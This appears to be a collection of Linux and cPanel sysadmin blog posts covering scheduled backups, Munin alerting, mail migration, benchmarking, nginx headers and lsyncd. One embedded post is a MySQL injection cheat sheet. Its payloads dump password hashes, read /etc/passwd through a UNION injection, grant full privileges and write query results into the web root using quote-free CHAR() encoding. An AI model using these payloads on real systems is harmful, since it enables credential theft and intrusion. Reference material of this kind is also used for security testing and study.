cPanel: Auto Backup and Remote Transfer using API + PHP

One good thing about cPanel is that you can generate backups automatically using the cPanel API. In this case, we will use a PHP script, run on a schedule, to automatically generate a backup and transfer it via FTP or SCP to another server. This can be done at the user level, without logging in to the cPanel login page.

To integrate with the cPanel API, we need the file xmlapi.php, which we can get from the cPanel GitHub repository at https://github.com/CpanelInc/xmlapi-php. This post is about creating a full backup and transferring it to a remote location via FTP automatically, using user privileges rather than root privileges. Variables as below:

cPanel: WHM 11.30.6 (build 6)
cPanel user: mycp123
cPanel password: Pas$r12cP
Domain: mycp123.org
Home directory: /home/mycp123

1. Download the PHP API from https://github.com/CpanelInc/xmlapi-php/downloads. I will download the zip archive to my local desktop and unzip it. The folder contains several files and directories, but we only need to upload xmlapi.php into the public_html folder using an FTP client.

2. Log in to cPanel and create the PHP script using File Manager. Go to cPanel > File Manager > Web Root > Go > New File > File Name: cpbackup.php > Create New File.

3. Open the file in text editor mode by right-clicking cpbackup.php and selecting Code Edit > Edit. The cPanel code editor should open. Copy in the following lines and save:

<?php
// Must include cPanel API
include "xmlapi.php";
 
// Credentials for cPanel account
$source_server_ip = ""; // Server IP or domain name eg: 212.122.3.77 or cpanel.domain.tld
$cpanel_account = ""; // cPanel username
$cpanel_password = ""; // cPanel password
 
// Credentials for FTP remote site
$ftphost = ""; // FTP host IP or domain name
$ftpacct = ""; // FTP account
$ftppass = ""; // FTP password
$email_notify = ''; // Email address for backup notification
 
$xmlapi = new xmlapi($source_server_ip);
$xmlapi->password_auth($cpanel_account,$cpanel_password);
$xmlapi->set_port('2083');
 
// Delete any previous backups before creating a new one
$conn_id = ftp_connect($ftphost);
$login_result = ftp_login($conn_id, $ftpacct, $ftppass);
$logs_dir = "/";
 
ftp_chdir($conn_id, $logs_dir);
$files = ftp_nlist($conn_id, ".");
foreach ($files as $file){
    ftp_delete($conn_id, $file);
}
 
ftp_close($conn_id);
 
$api_args = array(
    'passiveftp',
    $ftphost,
    $ftpacct,
    $ftppass,
    $email_notify,
    21,
    '/'
);
 
$xmlapi->set_output('json');
print $xmlapi->api1_query($cpanel_account,'Fileman','fullbackup',$api_args);
 
?>

4. Fill in the credential variables at the top of the script (the cPanel and FTP details) and save it.

Notes:
The script first connects to the destination FTP server and deletes any existing backups there before creating a new one (the ftp_connect block). Then, via the cPanel API 1 function Fileman::fullbackup (argument reference at http://docs.cpanel.net/twiki/bin/view/ApiDocs/Api1/ApiFileman#Fileman::fullbackup), it generates the backup and transfers it using passive FTP once it is ready.

5. We can execute this task manually by accessing the PHP file in a browser at http://www.mycp123.org/cpbackup.php. If successful, you should see JSON output returned as below:

{"apiversion":"1","type":"event","module":"Fileman","func":"fullbackup","source":"module","data":{"result":""},"event":{"result":1}}

6. To automate this task, we can simply create a cron job to run it weekly. Go to cPanel > Advanced > Cron jobs and use the following command:

php -q /home/mycp123/public_html/cpbackup.php
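
In the cron job form, choose a weekly schedule and paste in the command above. In raw crontab syntax, a weekly run (for example, every Sunday at 3:00 AM) would look like this:

0 3 * * 0 php -q /home/mycp123/public_html/cpbackup.php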


Done! You can create many more scripts with the cPanel API to automate your repetitive tasks.

cPanel: Trigger Alert from Munin

For cPanel servers, Munin is one of the important plugins to enable. cPanel provides it as a one-click installation under WHM > cPanel > Manage Plugins > Munin. With it, we can monitor and understand what is going on with our server resources and anticipate future problems like hard disk temperature, available disk space, MySQL throughput and many more.

We can take advantage of this monitoring tool to send alerts via email for certain critical services like Apache processes, the Exim mail queue and the server load average. I will use the following information to configure Munin:

Email to: webmaster_99@live.com
Server hostname: myserver.supercone.com
Services to monitor: Apache processes, mail queue, load average
Alerting level: warning and critical

Apache processes

Usually when the server is attacked via port 80 or 443, the attack fully utilizes all available Apache slots. The default cPanel Apache configuration allows 256 processes to run, and normal usage on this server is below 50 processes. This is tracked by the Munin plugin apache_processes (/etc/munin/plugins/apache_processes) and can be viewed in WHM > Plugins > Munin Service Monitor > ::Apache processes:

Based on that graph, I need to monitor busy80, with 50 processes as the warning threshold and 180 processes as critical:

apache_processes.busy80.warning 50
apache_processes.busy80.critical 180

Exim mail queue

Monitoring the mail queue helps prevent us from being spammed, or from becoming a spammer. We cannot always know how our mail users use their mailboxes, and some accounts may be compromised and used by spammers to send mail. If your mail queue is higher than usual, something bad is heading your way: you might be accused of hosting a spammer, the server IP may be blacklisted by anti-spam organizations, and the server's outgoing connections may be blocked by others.

The Exim mail queue is monitored by a Munin plugin called exim_mailqueue (/etc/munin/plugins/exim_mailqueue). You can view it at WHM > Plugins > Munin Service Monitor > ::Exim Mailqueue:

My mail queue averages around 480 mails, so I will set 500 as the warning threshold and 1000 as critical:

exim_mailqueue.mails.warning 500
exim_mailqueue.mails.critical 1000

Load average

This is the most important metric when checking the stability of a server. Load average is a value that represents your server's workload over a period of time. From the Munin monthly load average, my server runs at a 0.82 average:

My warning value will be 4 and critical 8 (usually the number of CPU cores x 2).

load.load.warning 4
load.load.critical 8

Munin Alert

Munin's configuration file on cPanel servers is located at /etc/munin/munin.conf. Open this file in a text editor and add the following lines:

contact.me.command mail -s "Munin notification ${var:host}" webmaster_99@live.com
contact.me.always_send warning critical

This enables email notification for warning and critical statuses. Now we need to configure which monitored plugins should trigger alerts, as described above. In the same file, you should notice the following lines:

[myserver.supercone.com]
     address 127.0.0.1
     use_node_name yes

Add all the warning and critical thresholds (as described above) under this directive, as below:

[myserver.supercone.com]
     address 127.0.0.1
     use_node_name yes
     apache_processes.busy80.warning 50
     apache_processes.busy80.critical 180
     exim_mailqueue.mails.warning 500
     exim_mailqueue.mails.critical 1000
     load.load.warning 4
     load.load.critical 8

Save the file and restart the munin-node service:

$ service munin-node restart
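
To sanity-check a threshold before waiting for an alert, you can run a plugin by hand with munin-run and compare its current reading against your limits (the value shown here is just an example):

$ munin-run load
load.value 0.82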

From now on, you will receive emails like the one below whenever a warning or critical alert is triggered:

supercone.com :: myserver.supercone.com :: Apache processes
     WARNINGs: busy servers 80 is 112.83 (outside range[:50]).

cPanel: Install PHP SSH2 Module

One of my developers requires the PHP SSH2 module to be loaded on the cPanel server. Since this module is not available in EasyApache, I need to install it separately and integrate it with the configuration we have already built using EasyApache.

1. Download and install libssh2 from http://www.libssh2.org/snapshots/:

$ cd /usr/local/src
$ wget http://www.libssh2.org/snapshots/libssh2-1.4.0-20120319.tar.gz
$ tar -xzf libssh2-1.4.0-20120319.tar.gz
$ cd libssh2-*
$ ./configure
$ make all install

2. Before we install the ssh2 module, we need to know the PHP extension_dir location:

$ php -i | grep extension_dir
/usr/local/lib/php/extensions/no-debug-non-zts-20090626

3. Then, download the PECL ssh2 module from http://pecl.php.net/package/ssh2 and install it:

$ cd /usr/local/lib/php/extensions/no-debug-non-zts-20090626
$ wget http://pecl.php.net/get/ssh2-0.11.3.tgz
$ tar -xzf ssh2-0.11.3.tgz
$ mv ssh2-0.11.3 php-ssh2
$ cd php-ssh2
$ phpize
$ ./configure --with-ssh2
$ make
$ make install

4. Now we need to enable the module in php.ini. Retrieve the php.ini location:

$ php -i | grep "Loaded Configuration File"
 Loaded Configuration File => /usr/local/lib/php.ini

Then run the following command to register the extension with PHP:

$ echo "extension=ssh2.so" >> /usr/local/lib/php.ini

5. Restart Apache web server (if you are using DSO):

$ service httpd restart

Done! You can check whether the SSH2 module is loaded using the following command:

$ php -i | grep ssh2
Registered PHP Streams => compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip, ssh2.shell, ssh2.exec, ssh2.tunnel, ssh2.scp, ssh2.sftp
ssh2
libssh2 version => 1.4.0-20120319
banner => SSH-2.0-libssh2_1.4.0-20120319
PWD => /usr/local/lib/php/extensions/no-debug-non-zts-20090626/php-ssh2
_SERVER["PWD"] => /usr/local/lib/php/extensions/no-debug-non-zts-20090626/php-ssh2
_ENV["PWD"] => /usr/local/lib/php/extensions/no-debug-non-zts-20090626/php-ssh2
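
Alternatively, a quicker way to confirm the extension is registered is to list PHP's loaded modules:

$ php -m | grep ssh2
ssh2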

Email Migration without Downtime

I have been assigned a task by the big boss: migrate our company's email without any downtime. Downtime in this case refers to the period while the MX record change propagates around the world to the new server. During that window, emails can be delivered to the old server instead of the new one, until client DNS servers clear their cached copy of the host record.

To achieve this, we need a server in between to act as the store-and-forward mail server, also known as a backup MX server. We point the MX record to this server, and then we change its forwarding IP from the old server to the new server. That way, every new email is delivered directly to the new server without any propagation delay.

I am using the following variables:

Backup MX Server: 211.44.22.100
Backup MX OS: CentOS 6.2 64bit
Old mail server: 182.22.60.20
New mail server: 60.1.222.100
Domain: mygreek.biz

Backup MX server

1. To eliminate DNS propagation issues during the migration, we need to set up the backup MX server at least 3 days before the migration is scheduled. We will use Postfix, a mail transfer agent, as the store-and-forward mail server. Install Postfix via yum, and turn off sendmail and SELinux:

$ setenforce 0
$ service sendmail stop
$ chkconfig sendmail off
$ yum install -y postfix

2. Edit /etc/postfix/main.cf in a text editor as below (note that Postfix does not allow inline comments, so each comment goes on its own line):

# server hostname
myhostname = forwarder.mygreek.biz
mydomain = localhost
myorigin = $mydomain
# listen on all available IPs
inet_interfaces = all
mydestination = $myhostname, localhost.$mydomain, $mydomain
mynetworks_style = host
relay_domains = mygreek.biz
transport_maps = hash:/etc/postfix/transport

3. Open /etc/postfix/transport to set up forwarding for the relayed domain. Point it to the old server:

mygreek.biz smtp:[182.22.60.20]

4. Activate the Postfix map, start the Postfix service and enable the service on boot:

$ postmap /etc/postfix/transport
$ chkconfig postfix on
$ service postfix start

The backup MX should now be able to receive and forward emails to the old mail server. Don't forget to allow port 25 through iptables so Postfix can run smoothly.
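
On CentOS, a typical pair of commands for this (assuming the stock iptables service) is:

$ iptables -I INPUT -p tcp --dport 25 -j ACCEPT
$ service iptables save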

MX record in NS

Once the backup MX server is ready, we need to update the MX record in the name server and point it to the backup MX. Log in to the name server and update the records:

mygreek.biz.    MX    10    mail.mygreek.biz.
mail             A          211.44.22.100

Make sure you do this at least 3 days before the migration starts, so DNS propagation does not affect the migration.
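
You can confirm the new record is being served with dig; the output should match the record above:

$ dig +short MX mygreek.biz
10 mail.mygreek.biz.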

Migrating Email

1. Before we start the migration, we need to stop the old server's mail service. Since the old server runs cPanel, I will stop and disable the Exim service so the backup MX can take over and hold email in its queue until the new mail server is up:

WHM > Service Configuration > Service Manager > Uncheck “Enabled” and “Monitor” for Exim > Save

2. I will use the cPanel migration utility called “Copy an account from another server”. Just follow the wizard and wait until the account copy completes.

3. Once the email migration is complete, we need to update the forwarding IP in the backup MX to the new server. Log in to the backup MX server and edit /etc/postfix/transport:

mygreek.biz smtp:[60.1.222.100]

Then update the Postfix mapping and restart the service to push the queued emails to the new mail server:

$ postmap /etc/postfix/transport
$ service postfix restart
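
You can watch the stored mail leave the backup MX with postqueue; an empty queue means everything has been handed off to the new server:

$ postqueue -p   # list messages still in the queue
$ postqueue -f   # flush: attempt to deliver all queued mail now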

On the new server, you will notice the queued emails from the backup MX starting to arrive. This guarantees no lost email and prevents mail from being delivered to the old server.

Completing the Migration

Monitor the email flow for a while and make sure all emails are delivered to their respective recipients. If everything runs smoothly, it is time to update the MX record to point to the new mail server, so we can remove the backup MX server later:

mygreek.biz.    MX    10    mail.mygreek.biz.
mail             A          60.1.222.100

Allow the backup MX server to keep running for at least 3 days, to make sure the new MX record has propagated around the world. To double-confirm, you can use this website to check whether your mail host has propagated:

http://www.whatsmydns.net/

If everything runs smoothly, you can shut down and remove the backup MX server, and the migration is complete.

Web Server Benchmarking using Apache Benchmark and gnuplot

Apache Benchmark (aka ab) is a tool for benchmarking HTTP web servers. It is recommended to test your web server's performance before switching it to a production environment. I use this tool to benchmark and stress-test our development server before it goes live.

Make sure you have the following prepared before benchmarking:

  • URL accessible via a public domain or IP: http://blog.secaserver.com
  • Expected number of concurrent clients the server should serve: 50 concurrent users
  • Expected number of requests per client: 10 requests per user
  • Verify whether HTTP keep-alive is supported. You can use phpinfo or examine the server headers: keep-alive supported
  • How the output should be presented: graph

I will run this benchmark remotely from a CentOS terminal server. The test should be performed at least 3 times so we can see a pattern. We will use gnuplot to present the data as a graph, so we need ab to export its output in a format gnuplot understands: TSV (tab-separated values). The first test writes to bench1.tsv, and subsequent tests use bench2.tsv and so on.

1. Install the required tools using yum. We need httpd, httpd-tools (which provides ab) and gnuplot:

$ yum install -y httpd httpd-tools gnuplot

2. For the first test, start benchmarking with the following command:

$ ab -c 10 -n 50 -k -g /var/www/html/bench1.tsv http://blog.secaserver.com/

Repeat the step above for the 2nd and 3rd tests:

$ ab -c 10 -n 50 -k -g /var/www/html/bench2.tsv http://blog.secaserver.com/
$ ab -c 10 -n 50 -k -g /var/www/html/bench3.tsv http://blog.secaserver.com/

3. The TSV files are now ready to be plotted. Let's generate the graph in PNG format:

$ cd /var/www/html
$ gnuplot

You will enter the gnuplot console. Run the following commands to generate the image:

gnuplot> set terminal png
Terminal type set to 'png'
gnuplot> set output "benchmark.png"
gnuplot> set title "Benchmark for blog.secaserver.com"
gnuplot> set size 1,1
gnuplot> set grid y
gnuplot> set xlabel 'Request'
gnuplot> set ylabel 'Response Time (ms)'
gnuplot> plot "bench1.tsv" using 10 smooth sbezier with lines title "Benchmark 1:", "bench2.tsv" using 10 smooth sbezier with lines title "Benchmark 2:", "bench3.tsv" using 10 smooth sbezier with lines title "Benchmark 3:"
gnuplot> exit

Done! Since the PNG is written under /var/www/html, you should be able to view the image in a browser via the benchmarking server's address.

Notes

We can create a template script for gnuplot to simplify graph generation. The following template performs the same actions as step 3. We will name this template file benchmark.tpl:

# output as png image
set terminal png
 
# save file to "benchmark.png"
set output "benchmark.png"
 
# graph title
set title "Benchmark for blog.secaserver.com"
 
# aspect ratio for image size
set size 1,1
 
# enable grid on y-axis
set grid y
 
# x-axis label
set xlabel "Request"
 
# y-axis label
set ylabel "Response Time (ms)"
 
# plot data from bench1.tsv,bench2.tsv and bench3.tsv using column 10 with smooth sbezier lines
plot "bench1.tsv" using 10 smooth sbezier with lines title "Benchmark 1:", \
"bench2.tsv" using 10 smooth sbezier with lines title "Benchmark 2:", \
"bench3.tsv" using 10 smooth sbezier with lines title "Benchmark 3:"

To execute the template, just run the following command:

$ gnuplot benchmark.tpl

If you examine the TSV files created by ab, you will see the column headers ctime, dtime, ttime and wait. Definitions as below:

ctime: Connection Time
dtime: Processing Time
ttime: Total Time
wait: Waiting Time
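
As a quick sanity check without gnuplot, you can average a column with awk. This sketch assumes ab's default tab-separated layout, where ttime is the fifth field (after starttime, seconds, ctime and dtime):

$ awk -F'\t' 'NR > 1 { sum += $5 } END { printf "average ttime: %.2f ms\n", sum/(NR-1) }' bench1.tsv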

Customize Server Header using NginX

Whenever you browse a website, you can identify the web server software by retrieving the Server response header. For example, using this website, http://serverheader.com/header/form.html, the following response is returned for www.opensource.org:

HTTP/1.1 200 OK
Date: Tue, 13 Mar 2012 03:44:54 GMT
Server: Apache/2.2.22 (FreeBSD) DAV/2 SVN/1.7.3 mod_ssl/2.2.22 OpenSSL/1.0.0g
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=tul1j9kd7mme2r01up3lbq8326; expires=Thu, 05-Apr-2012 07:18:14 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 13 Mar 2012 03:32:52 GMT
ETag: "ab9ee40bb417fbfde83d38a6d6f4754b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

From this information we know the web server is Apache version 2.2.22 running on FreeBSD, with modules such as WebDAV, SVN, mod_ssl and OpenSSL enabled.

With NginX, you can actually personalize the server header to any name you want. For example, instead of showing the real web server name, “nginx”, I want users to see the web server name as “My Web Server”.

I will use the following variables to test:

OS: CentOS 6.2 64bit
NginX version: 1.0.13
Web directory: /home/mywebs/public_html
Domain: mywebserver.net

1. Install all dependencies using yum:

$ yum install -y lynx pcre* openssl* zlib*

2. Download and install NginX from source:

$ cd /usr/local/src
$ wget http://nginx.org/download/nginx-1.0.13.tar.gz
$ tar -xzf  nginx-1.0.13.tar.gz
$ cd nginx-*
$ ./configure
$ make
$ make install

3. Download the NginX headers-more module from https://github.com/agentzh/headers-more-nginx-module/tags. I will use the latest version at the moment, v0.17rc1, and download it using lynx:

$ cd /usr/local/src
$ lynx https://github.com/agentzh/headers-more-nginx-module/zipball/v0.17rc1

Press “D”, then Enter, and select “Save to disk” using the arrow keys to download the file; press Enter, then ‘q’ to quit and ‘y’ to confirm. You should see a new .zip file once complete.

4. We need to unzip, rename and move the directory into a modules directory under the NginX installation. Since this directory does not exist yet, we create it first:

$ mkdir /usr/local/nginx/mod
$ unzip agentzh-headers-more-nginx-module-v0.17rc1-0-g3580526.zip
$ mv agentzh-headers-more-nginx-module-3580526 headers-more
$ mv headers-more /usr/local/nginx/mod

5. Now we need to recompile NginX with the module. You could actually compile the module in on the first pass, pointing configure at wherever you unpacked it; but I want the NginX and module installation organized, so I installed NginX first and now recompile it with the module.

$ cd /usr/local/src/nginx*
$ ./configure --add-module=/usr/local/nginx/mod/headers-more/
$ make
$ make install
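
You can confirm the module was built in by inspecting the configure arguments:

$ /usr/local/nginx/sbin/nginx -V 2>&1 | grep headers-more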

6. As stated in the variables above, I need to configure NginX to listen for the domain mywebserver.net, mapped to /home/mywebs/public_html. So I will create the user who owns this directory:

$ useradd -m mywebs
$ mkdir /home/mywebs/public_html /home/mywebs/logs
$ touch /home/mywebs/logs/access_log /home/mywebs/logs/error_log
$ chown -R mywebs:mywebs /home/mywebs
$ chmod 755 /home/mywebs

7. Make some changes to the NginX configuration file, located at /usr/local/nginx/conf/nginx.conf, as below:

user  nobody;
worker_processes  1;
 
error_log  logs/error.log  info;
 
events {
    worker_connections  1024;
}
 
http {
    #this is your web server name
    more_set_headers    "Server: My Web Server";
    server_names_hash_max_size 2048;
    include       mime.types;
    default_type  application/octet-stream;
 
    log_format   main '$remote_addr - $remote_user [$time_local]  $status '
    '"$request" $body_bytes_sent "$http_referer" '
    '"$http_user_agent" "$http_x_forwarded_for"';
 
    sendfile        on;
    tcp_nopush     on;
 
    keepalive_timeout  10;
 
    gzip  on;
 
 server {
 
  # this is your access logs location
  access_log /home/mywebs/logs/access_log;
  # this is your error logs location
  error_log  /home/mywebs/logs/error_log warn;
  listen    80;
  # change to your domain
  server_name  mywebserver.net www.mywebserver.net;
 
  location / {
   # this is your public_html directory
   root   /home/mywebs/public_html;
   index  index.html index.htm;
  }
 }
}

8. Before starting NginX, make sure the configuration syntax checks out:

$ /usr/local/nginx/sbin/nginx -t

9. If everything is okay, we can start the web server:

$ /usr/local/nginx/sbin/nginx

Done. Now check the server header and you will see your customized web server name in the “Server” field. I checked using a Chrome extension called “Domain Details”, and my new server header is:

Date: Tue, 13 Mar 2012 04:50:14 GMT
Connection: keep-alive
Content-Length: 23
Last-Modified: Tue, 13 Mar 2012 04:29:33 GMT
Server: My Web Server
Content-Type: text/html
Accept-Ranges: bytes
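
If you prefer the command line, curl can fetch the same headers:

$ curl -sI http://www.mywebserver.net/ | grep Server
Server: My Web Server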

If I add the following lines to the NginX configuration file:

more_clear_headers   "Content-Type: ";
more_clear_headers   "Accept-Ranges: ";
more_clear_headers   "Content-Length: ";

then after an NginX restart, the full server header is returned as below:

Date: Tue, 13 Mar 2012 04:50:14 GMT
Connection: keep-alive
Last-Modified: Tue, 13 Mar 2012 04:29:33 GMT
Server: My Web Server

For more information on headers-more usage, refer to this page:

http://wiki.nginx.org/HttpHeadersMoreModule

Linux: Mount Box.net Account Locally

Cloud storage has created a trend of storing and accessing data from anywhere in the world. Two of the most popular cloud storage providers are Dropbox and Box.net. In this post, I am going to show you how to mount a Box.net account inside a Linux box. You are required to have a Box.net account, which is free if you register for the personal plan and comes with 5 GB of online storage space.

We will use davfs2 to mount the Box.net account via WebDAV (Dropbox does not offer this feature at the moment). Variables used as follows:

OS: CentOS 6.2 64bit
Box.net username: [email protected]
Box.net password: MyGu1234
Mount point: /mnt/box/

1. The simplest installation path is via the RPMforge repository:

$ cd /usr/local/src
$ rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt
$ wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm
$ rpm -K rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm
$ rpm -i rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm

2. Once done, let's install davfs2 via yum:

$ yum install -y davfs2

3. Create the mount point:

$ mkdir /mnt/box

4. Add the following line to /etc/fstab:

https://www.box.com/dav    /mnt/box    davfs    rw,user,noauto 0 0

5. Add the Box.net account information into /etc/davfs2/secrets using a text editor:

https://www.box.com/dav  [email protected]  MyGu1234

Note: if your password contains special characters, escape each one with a backslash in front of it (thanks to Keith for this highlight).

6. Disable the lock mechanism for the mounted filesystem. Open /etc/davfs2/davfs2.conf and find the following value:

#use_locks    1

And change to:

use_locks     0

7. Mount the partition:

$ mount /mnt/box
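
To confirm the WebDAV share is mounted, check the mount table:

$ mount | grep davfs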

Done! Now you can start syncing files to your cloud storage by copying them into the /mnt/box directory. Log in to the Box.net account and verify that the files exist. Depending on the file size, you might need to wait a while after the copy completes before the files appear in the Box.net account.

As an example, I synced my public_html backup files to the cloud storage, and they show up in the Box.net account.

Happy ‘clouding’. Cheers!

Basic MySQL Injection Cheat Sheet

Version

SELECT @@version;

Comments

SELECT 1; #comment
SELECT /*comment*/1;

Current User

SELECT user();
SELECT system_user();

List Users

SELECT user FROM mysql.user;

List Password Hashes

SELECT host, user, password FROM mysql.user;

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;

List privileges for the user on column:

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

Current Database

SELECT database();

List Databases

SELECT schema_name FROM information_schema.schemata;
SELECT DISTINCT(db) FROM mysql.db;

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # first row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # second row

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT CHAR(65); # returns A

Char -> ASCII Value

SELECT ASCII('A'); # returns 65

Casting

SELECT CAST('1' AS unsigned integer); # returns 1
SELECT CAST('123' AS char); # returns 123

String Concatenation

SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT IF(1=1,'foo','bar'); # returns 'foo'
SELECT IF(1=2,'foo','bar'); # returns 'bar'

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
SELECT CASE WHEN (1=2) THEN 'A' ELSE 'B' END; # returns B

Avoiding Quotes

SELECT 0x414243; # returns ABC using hexadecimal

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

Local File Access

...' UNION ALL SELECT LOAD_FILE('/etc/passwd')
SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1';

Delete Users

DROP USER test1;

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO 'test1'@'%';

Location of DB files

SELECT @@datadir;

Write query result into file

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt';

Write query result into file without single quotes

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(114),CHAR(111),CHAR(111),CHAR(116),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(47),CHAR(116),CHAR(109),CHAR(112),CHAR(47),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(101),CHAR(115),CHAR(46),CHAR(116),CHAR(120),CHAR(116),CHAR(39));

The query above is equivalent to:

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/tmp/passes.txt';

Linux: Using lsyncd – Live Syncing (Mirror) Daemon

I have a situation where one critical website on our company server needs to be kept in sync with our backup server. Sync means that whatever changes happen on the master server are replicated to the slave server. Yes, you could use rsync, but I do not want to schedule the task as a cron job. There is a better tool, very suitable for this situation, called lsyncd.

Lsyncd watches a local directory tree through an event monitor interface (inotify or fsevents). It aggregates and combines events for a few seconds and then spawns one or more processes to synchronize the changes; by default this is rsync. Lsyncd is thus a lightweight live mirror solution that is comparatively easy to install, requires no new filesystems or block devices, and does not hamper local filesystem performance.

OS: RHEL 5.3 (Tikanga) 64bit
Source IP: 192.168.50.10
Source directory: /home/webmedia/public_html
Destination IP: 192.168.50.20
Destination directory: /backup/webmedia/public_html

Destination server

On the destination server, we just need to make sure the destination directory exists. If not, create it:

$ mkdir -p /backup/webmedia/public_html

Source server

1. It is good to have a hosts entry that points to the destination IP address. Open /etc/hosts and add the destination host:

192.168.50.20   backup-server.local

2. We need to allow passwordless authentication to the destination server. We will use the root user to execute the sync process. Run the following command as root:

$ ssh-keygen -t dsa

Press Enter at all prompts. Once done, run the following command to copy the public key to the destination server:

$ cat ~/.ssh/id_dsa.pub | ssh root@backup-server.local "cat >> ~/.ssh/authorized_keys"

Or we can use ssh-copy-id, which does the same thing:

$ ssh-copy-id -i ~/.ssh/id_dsa root@backup-server.local

Once done, try to access the destination server with the following command and make sure you are not prompted for a password:

$ ssh root@backup-server.local

3. Lsyncd requires Lua. On a recent RedHat distribution (RHEL 6) you can install it with yum:

$ yum install -y lua*

In my case, I am on RHEL 5 and the packages are not available via yum, so I need to get the RPMs from somewhere else, which is here: http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/

Download these 3 packages and install:

  1. lua-5.1.4-1.el5.art.x86_64.rpm
  2. lua-static-5.1.4-1.el5.art.x86_64.rpm
  3. lua-devel-5.1.4-1.el5.art.x86_64.rpm
$ mkdir -p /usr/local/src/lua
$ cd /usr/local/src/lua
$ wget http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/lua-5.1.4-1.el5.art.x86_64.rpm
$ wget http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/lua-devel-5.1.4-1.el5.art.x86_64.rpm
$ wget http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/lua-static-5.1.4-1.el5.art.x86_64.rpm
$ rpm -Uhv *.rpm

4. Download and install lsyncd from this website: http://code.google.com/p/lsyncd/downloads/list:

$ cd /usr/local/src
$ wget http://lsyncd.googlecode.com/files/lsyncd-2.0.6.tar.gz
$ tar -xzf  lsyncd-2.0.6.tar.gz
$ cd lsyncd-*
$ ./configure
$ make 
$ make install

5. Once done, start the daemon on the source server with this command:

$ lsyncd -rsyncssh /home/webmedia/public_html root@backup-server.local /backup/webmedia/public_html

Done. The files should be in sync now. You can check the process using the ‘ps’ command and monitor progress by watching the destination directory. In some cases, the sync terminates immediately with the following error in /var/log/messages:

lsyncd: Error, Consider increasing /proc/sys/fs/inotify/max_user_watches

Depending on the directory you are watching, you might need to increase max_user_watches to a higher value using the following command:

$ echo 65500 > /proc/sys/fs/inotify/max_user_watches
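
Note that this setting does not survive a reboot. To make it permanent, add it to /etc/sysctl.conf and reload:

$ echo "fs.inotify.max_user_watches = 65500" >> /etc/sysctl.conf
$ sysctl -p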

Once the synchronization completes, you can test it by adding more files on the source server; after a few seconds you will see them synced to the destination directory. To make this daemon run automatically after boot, you can put the lsyncd command into /etc/rc.local, as shown below.
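
For example, appending the same command from step 5 to the boot script:

$ echo 'lsyncd -rsyncssh /home/webmedia/public_html root@backup-server.local /backup/webmedia/public_html' >> /etc/rc.local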